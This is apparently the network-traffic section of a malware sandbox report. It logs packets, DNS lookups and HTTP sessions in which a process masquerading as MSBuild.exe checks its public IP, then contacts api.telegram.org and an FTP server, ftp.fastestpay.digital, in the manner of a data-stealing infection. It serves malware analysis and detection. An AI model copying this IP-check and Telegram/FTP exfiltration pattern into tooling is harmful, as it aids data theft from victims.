Sep 25, 2024 18:50:26.325206041 CEST	443	49699	104.98.116.138	192.168.2.7
Sep 25, 2024 18:50:26.325297117 CEST	49699	443	192.168.2.7	104.98.116.138
Sep 25, 2024 18:50:26.331159115 CEST	80	49700	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:26.489573956 CEST	49700	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:26.499501944 CEST	49705	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:26.499547005 CEST	443	49705	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:26.499613047 CEST	49705	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:26.536030054 CEST	49705	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:26.536062002 CEST	443	49705	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:26.677072048 CEST	49671	443	192.168.2.7	204.79.197.203
Sep 25, 2024 18:50:27.056118965 CEST	443	49705	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:27.056210995 CEST	49705	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:27.077224970 CEST	49705	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:27.077255964 CEST	443	49705	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:27.077694893 CEST	443	49705	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:27.131668091 CEST	49705	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:27.241390944 CEST	49705	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:27.287400961 CEST	443	49705	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:27.438679934 CEST	443	49705	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:27.438777924 CEST	443	49705	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:27.439141035 CEST	49705	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:27.493565083 CEST	49705	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:27.495405912 CEST	49700	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:27.501319885 CEST	80	49700	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:27.657648087 CEST	80	49700	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:27.665575981 CEST	49707	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:27.665683031 CEST	443	49707	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:27.665864944 CEST	49707	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:27.666280985 CEST	49707	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:27.666320086 CEST	443	49707	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:27.715748072 CEST	49700	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:27.723957062 CEST	49677	443	192.168.2.7	20.50.201.200
Sep 25, 2024 18:50:28.141377926 CEST	443	49707	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:28.212570906 CEST	49707	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:28.212646008 CEST	443	49707	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:28.336242914 CEST	443	49707	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:28.336385012 CEST	443	49707	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:28.336482048 CEST	49707	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:28.373481035 CEST	49707	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:28.486076117 CEST	49700	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:28.496535063 CEST	80	49700	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:28.496617079 CEST	49700	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:28.502996922 CEST	49708	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:28.512176991 CEST	80	49708	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:28.512274981 CEST	49708	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:28.571722984 CEST	49708	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:28.577394962 CEST	80	49708	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:29.083614111 CEST	80	49708	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:29.084872961 CEST	49709	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:29.084920883 CEST	443	49709	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:29.084983110 CEST	49709	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:29.085259914 CEST	49709	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:29.085270882 CEST	443	49709	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:29.129942894 CEST	49708	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:29.557893991 CEST	443	49709	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:29.565093994 CEST	49709	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:29.565119982 CEST	443	49709	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:29.699675083 CEST	443	49709	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:29.699933052 CEST	443	49709	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:29.700011015 CEST	49709	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:29.700496912 CEST	49709	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:29.703779936 CEST	49708	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:29.705538034 CEST	49710	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:29.709208965 CEST	80	49708	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:29.709263086 CEST	49708	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:29.710686922 CEST	80	49710	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:29.710875034 CEST	49710	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:29.710875034 CEST	49710	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:29.716016054 CEST	80	49710	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:30.314979076 CEST	80	49710	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:30.316358089 CEST	49711	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:30.316400051 CEST	443	49711	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:30.316509008 CEST	49711	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:30.316741943 CEST	49711	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:30.316754103 CEST	443	49711	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:30.364603043 CEST	49710	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:30.794281960 CEST	443	49711	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:30.795767069 CEST	49711	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:30.795799971 CEST	443	49711	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:30.954201937 CEST	443	49711	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:30.954298019 CEST	443	49711	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:30.954391003 CEST	49711	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:30.955152988 CEST	49711	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:30.987107038 CEST	49712	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:30.993143082 CEST	80	49712	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:30.993247032 CEST	49712	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:30.993423939 CEST	49712	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:30.999166965 CEST	80	49712	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:31.583887100 CEST	80	49712	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:31.585115910 CEST	49713	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:31.585159063 CEST	443	49713	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:31.585215092 CEST	49713	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:31.585457087 CEST	49713	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:31.585468054 CEST	443	49713	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:31.630238056 CEST	49712	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:32.044315100 CEST	443	49713	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:32.046073914 CEST	49713	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:32.046103001 CEST	443	49713	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:32.229197025 CEST	443	49713	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:32.229306936 CEST	443	49713	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:32.229361057 CEST	49713	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:32.229820013 CEST	49713	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:32.233043909 CEST	49712	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:32.234184980 CEST	49715	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:32.239061117 CEST	80	49715	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:32.239171982 CEST	49715	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:32.239195108 CEST	80	49712	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:32.239262104 CEST	49712	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:32.239438057 CEST	49715	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:32.244546890 CEST	80	49715	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:32.827362061 CEST	80	49715	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:32.828762054 CEST	49717	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:32.828830957 CEST	443	49717	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:32.828957081 CEST	49717	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:32.829179049 CEST	49717	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:32.829194069 CEST	443	49717	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:32.880364895 CEST	49715	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:33.336299896 CEST	443	49717	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:33.347768068 CEST	49717	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:33.347821951 CEST	443	49717	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:33.477098942 CEST	443	49717	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:33.477334976 CEST	443	49717	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:33.477461100 CEST	49717	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:33.477766991 CEST	49717	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:33.481291056 CEST	49715	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:33.482655048 CEST	49719	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:33.486588955 CEST	80	49715	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:33.486681938 CEST	49715	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:33.487521887 CEST	80	49719	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:33.487612009 CEST	49719	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:33.487730026 CEST	49719	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:33.492666006 CEST	80	49719	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:35.050544977 CEST	80	49719	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:35.051843882 CEST	49721	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:35.051884890 CEST	443	49721	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:35.052018881 CEST	49721	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:35.052714109 CEST	49721	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:35.052727938 CEST	443	49721	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:35.098988056 CEST	49719	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:35.551023006 CEST	443	49721	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:35.552959919 CEST	49721	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:35.553000927 CEST	443	49721	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:35.699641943 CEST	443	49721	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:35.699934959 CEST	443	49721	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:35.700081110 CEST	49721	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:35.700361013 CEST	49721	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:35.703522921 CEST	49719	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:35.704718113 CEST	49722	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:35.709163904 CEST	80	49719	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:35.709233999 CEST	49719	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:35.710244894 CEST	80	49722	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:35.710311890 CEST	49722	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:35.710405111 CEST	49722	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:35.716044903 CEST	80	49722	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:39.297323942 CEST	80	49722	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:39.348958969 CEST	49722	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:39.508399963 CEST	49722	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:39.511831045 CEST	49727	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:39.513577938 CEST	80	49722	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:39.513624907 CEST	49722	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:39.516894102 CEST	80	49727	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:39.516969919 CEST	49727	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:39.517070055 CEST	49727	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:39.522000074 CEST	80	49727	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:39.630300999 CEST	49677	443	192.168.2.7	20.50.201.200
Sep 25, 2024 18:50:42.078614950 CEST	80	49727	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:42.079968929 CEST	49731	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:42.080013990 CEST	443	49731	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:42.080101013 CEST	49731	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:42.080372095 CEST	49731	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:42.080380917 CEST	443	49731	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:42.130218029 CEST	49727	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:42.594897032 CEST	443	49731	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:42.609523058 CEST	49731	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:42.609580994 CEST	443	49731	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:42.737198114 CEST	443	49731	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:42.737312078 CEST	443	49731	188.114.96.3	192.168.2.7
Sep 25, 2024 18:50:42.737386942 CEST	49731	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:42.746630907 CEST	49731	443	192.168.2.7	188.114.96.3
Sep 25, 2024 18:50:42.923114061 CEST	49727	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:42.928540945 CEST	80	49727	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:42.928606033 CEST	49727	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:42.931128025 CEST	49732	443	192.168.2.7	149.154.167.220
Sep 25, 2024 18:50:42.931174994 CEST	443	49732	149.154.167.220	192.168.2.7
Sep 25, 2024 18:50:42.931226969 CEST	49732	443	192.168.2.7	149.154.167.220
Sep 25, 2024 18:50:42.931575060 CEST	49732	443	192.168.2.7	149.154.167.220
Sep 25, 2024 18:50:42.931591034 CEST	443	49732	149.154.167.220	192.168.2.7
Sep 25, 2024 18:50:43.596052885 CEST	443	49732	149.154.167.220	192.168.2.7
Sep 25, 2024 18:50:43.596193075 CEST	49732	443	192.168.2.7	149.154.167.220
Sep 25, 2024 18:50:43.600033998 CEST	49732	443	192.168.2.7	149.154.167.220
Sep 25, 2024 18:50:43.600055933 CEST	443	49732	149.154.167.220	192.168.2.7
Sep 25, 2024 18:50:43.600326061 CEST	443	49732	149.154.167.220	192.168.2.7
Sep 25, 2024 18:50:43.601839066 CEST	49732	443	192.168.2.7	149.154.167.220
Sep 25, 2024 18:50:43.647409916 CEST	443	49732	149.154.167.220	192.168.2.7
Sep 25, 2024 18:50:43.852338076 CEST	443	49732	149.154.167.220	192.168.2.7
Sep 25, 2024 18:50:43.852421045 CEST	443	49732	149.154.167.220	192.168.2.7
Sep 25, 2024 18:50:43.852493048 CEST	49732	443	192.168.2.7	149.154.167.220
Sep 25, 2024 18:50:43.852981091 CEST	49732	443	192.168.2.7	149.154.167.220
Sep 25, 2024 18:50:49.044960976 CEST	49710	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:49.476592064 CEST	49733	21	192.168.2.7	192.64.117.204
Sep 25, 2024 18:50:49.481724977 CEST	21	49733	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:49.481838942 CEST	49733	21	192.168.2.7	192.64.117.204
Sep 25, 2024 18:50:49.483525991 CEST	49733	21	192.168.2.7	192.64.117.204
Sep 25, 2024 18:50:49.488477945 CEST	21	49733	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:49.488584995 CEST	49733	21	192.168.2.7	192.64.117.204
Sep 25, 2024 18:50:50.992445946 CEST	49734	21	192.168.2.7	192.64.117.204
Sep 25, 2024 18:50:50.999097109 CEST	21	49734	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:50.999198914 CEST	49734	21	192.168.2.7	192.64.117.204
Sep 25, 2024 18:50:51.631582975 CEST	21	49734	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:51.631845951 CEST	49734	21	192.168.2.7	192.64.117.204
Sep 25, 2024 18:50:51.636795998 CEST	21	49734	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:51.800518990 CEST	21	49734	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:51.800785065 CEST	49734	21	192.168.2.7	192.64.117.204
Sep 25, 2024 18:50:51.805644989 CEST	21	49734	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:52.144313097 CEST	21	49734	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:52.144525051 CEST	49734	21	192.168.2.7	192.64.117.204
Sep 25, 2024 18:50:52.149492025 CEST	21	49734	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:52.426245928 CEST	21	49734	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:52.426471949 CEST	49734	21	192.168.2.7	192.64.117.204
Sep 25, 2024 18:50:52.431457043 CEST	21	49734	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:52.632359028 CEST	21	49734	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:52.632617950 CEST	49734	21	192.168.2.7	192.64.117.204
Sep 25, 2024 18:50:52.637609005 CEST	21	49734	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:52.809649944 CEST	21	49734	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:52.809813976 CEST	49734	21	192.168.2.7	192.64.117.204
Sep 25, 2024 18:50:52.820214033 CEST	21	49734	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:52.985399008 CEST	21	49734	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:52.986135006 CEST	49735	12044	192.168.2.7	192.64.117.204
Sep 25, 2024 18:50:52.991046906 CEST	12044	49735	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:52.991146088 CEST	49735	12044	192.168.2.7	192.64.117.204
Sep 25, 2024 18:50:52.991204977 CEST	49734	21	192.168.2.7	192.64.117.204
Sep 25, 2024 18:50:52.996148109 CEST	21	49734	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:53.527370930 CEST	21	49734	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:53.527754068 CEST	49735	12044	192.168.2.7	192.64.117.204
Sep 25, 2024 18:50:53.527849913 CEST	49735	12044	192.168.2.7	192.64.117.204
Sep 25, 2024 18:50:53.532732964 CEST	12044	49735	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:53.533165932 CEST	12044	49735	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:53.533243895 CEST	49735	12044	192.168.2.7	192.64.117.204
Sep 25, 2024 18:50:53.567842007 CEST	49734	21	192.168.2.7	192.64.117.204
Sep 25, 2024 18:50:53.700197935 CEST	21	49734	192.64.117.204	192.168.2.7
Sep 25, 2024 18:50:53.739712954 CEST	49734	21	192.168.2.7	192.64.117.204

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2024 18:50:21.098022938 CEST	60041	53	192.168.2.7	1.1.1.1
Sep 25, 2024 18:50:21.404546976 CEST	62112	53	192.168.2.7	1.1.1.1
Sep 25, 2024 18:50:21.412220955 CEST	53	62112	1.1.1.1	192.168.2.7
Sep 25, 2024 18:50:26.441977978 CEST	54957	53	192.168.2.7	1.1.1.1
Sep 25, 2024 18:50:26.498349905 CEST	53	54957	1.1.1.1	192.168.2.7
Sep 25, 2024 18:50:42.923666954 CEST	61507	53	192.168.2.7	1.1.1.1
Sep 25, 2024 18:50:42.930602074 CEST	53	61507	1.1.1.1	192.168.2.7
Sep 25, 2024 18:50:49.217139006 CEST	49918	53	192.168.2.7	1.1.1.1
Sep 25, 2024 18:50:49.475786924 CEST	53	49918	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 25, 2024 18:50:21.098022938 CEST	192.168.2.7	1.1.1.1	0x81a8	Standard query (0)	time.windows.com	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:50:21.404546976 CEST	192.168.2.7	1.1.1.1	0x219d	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:50:26.441977978 CEST	192.168.2.7	1.1.1.1	0xbbbb	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:50:42.923666954 CEST	192.168.2.7	1.1.1.1	0x1536	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:50:49.217139006 CEST	192.168.2.7	1.1.1.1	0x1dc5	Standard query (0)	ftp.fastestpay.digital	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 25, 2024 18:50:21.115210056 CEST	1.1.1.1	192.168.2.7	0x81a8	No error (0)	time.windows.com	twc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 25, 2024 18:50:21.412220955 CEST	1.1.1.1	192.168.2.7	0x219d	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 25, 2024 18:50:21.412220955 CEST	1.1.1.1	192.168.2.7	0x219d	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:50:21.412220955 CEST	1.1.1.1	192.168.2.7	0x219d	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:50:21.412220955 CEST	1.1.1.1	192.168.2.7	0x219d	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:50:21.412220955 CEST	1.1.1.1	192.168.2.7	0x219d	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:50:21.412220955 CEST	1.1.1.1	192.168.2.7	0x219d	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:50:25.523742914 CEST	1.1.1.1	192.168.2.7	0x2760	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:50:25.523742914 CEST	1.1.1.1	192.168.2.7	0x2760	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:50:26.498349905 CEST	1.1.1.1	192.168.2.7	0xbbbb	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:50:26.498349905 CEST	1.1.1.1	192.168.2.7	0xbbbb	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:50:42.930602074 CEST	1.1.1.1	192.168.2.7	0x1536	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Sep 25, 2024 18:50:49.475786924 CEST	1.1.1.1	192.168.2.7	0x1dc5	No error (0)	ftp.fastestpay.digital		192.64.117.204	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49700	158.101.44.242	80	7860	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 18:50:22.069665909 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 25, 2024 18:50:24.270399094 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:50:24 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0fc0cea3d7c615cb45ab5500fe2699dc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 25, 2024 18:50:24.281910896 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 25, 2024 18:50:26.331159115 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:50:26 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: de33b42a3e877568a07bbff1cee7887a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 25, 2024 18:50:27.495405912 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 25, 2024 18:50:27.657648087 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:50:27 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: dfbad2923289082662d6a3a3bd9a8119 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49708	158.101.44.242	80	7860	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
